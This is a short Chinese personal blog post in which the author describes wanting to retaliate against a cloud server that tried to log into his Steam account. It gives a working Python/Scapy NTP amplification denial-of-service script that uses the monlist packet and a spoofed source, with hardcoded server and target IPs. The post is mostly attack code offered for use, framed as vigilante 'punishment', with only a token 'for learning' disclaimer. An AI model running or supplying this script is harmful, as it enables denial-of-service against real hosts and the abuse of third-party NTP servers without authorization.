一切皆有可能
anywill ,anything will ....go better or worse ,go success or failure,go......一切皆有可能

python UDP攻击

anywill~2019-02-11 /python/网络安全

0x01 前言

最近,我的stream账号一直有人尝试登陆,邮件有记录登陆IP,发现原来是使用腾讯云服务器,然后去shodan 找端口,发现竟然开启ntp端口。

我就想通过ntp的udp反射攻击,然腾讯云小惩一下这台服务器。(运营商发现机器乱发包,会警告,严重的话,会禁用这台服务器,直到这台服务器修复完毕)

0x02 上代码!

#!/usr/bin/env python
from scapy.all import *
import sys
import threading
import time
import random   # For Random source port
# NTP Amp DOS attack
# by DaRkReD
# usage ntpdos.py <target ip> <ntpserver list> <number of threads> ex: ntpdos.py 1.2.3.4 file.txt 10
# FOR USE ON YOUR OWN NETWORK ONLY

# Random source port added by JDMoore0883

# packet sender


def deny():
    # Import globals to function
    global ntplist
    global currentserver
    global data
    global target
    ntpserver = ntplist[currentserver]  # Get new server
    print "ip:%s" % ntpserver
    currentserver = currentserver + 1  # Increment for next
    packet = IP(dst=ntpserver, src=target)/UDP(sport=random.randint(2000, 65535), dport=123)/Raw(load=data)  # BUILD IT
    send(packet, loop=1)  # SEND IT

# So I dont have to have the same stuff twice


def printhelp():
    print "NTP Amplification DOS Attack"
    print "By DaRkReD"
    print "Usage ntpdos.py <target ip> <ntpserver list> <number of threads>"
    print "ex: ex: ntpdos.py 1.2.3.4 file.txt 10"
    print "NTP serverlist file should contain one IP per line"
    print "MAKE SURE YOUR THREAD COUNT IS LESS THAN OR EQUAL TO YOUR NUMBER OF SERVERS"
    exit(0)


try:
    # Magic Packet aka NTP v2 Monlist Packet
    data = "\x17\x00\x03\x2a" + "\x00" * 4

    ntpserver = '120.25.115.20'
    target = '188.131.200.22'
    packet = IP(dst=ntpserver, src=target)/UDP(sport=random.randint(2000, 65535), dport=123)/Raw(load=data)  # BUILD IT
    # send(packet, loop=1)  # SEND IT
    send(packet, inter=1, count=5)  # SEND IT

    # In progress!
    print "Sending..."


except KeyboardInterrupt:
    print("Script Stopped [ctrl + c]... Shutting down")
    # Script ends here

0x03 结束语

免责声明:此代码只供学习,禁止商业使用了和非法用途!

发表评论

电子邮件地址不会被公开。 必填项已用*标注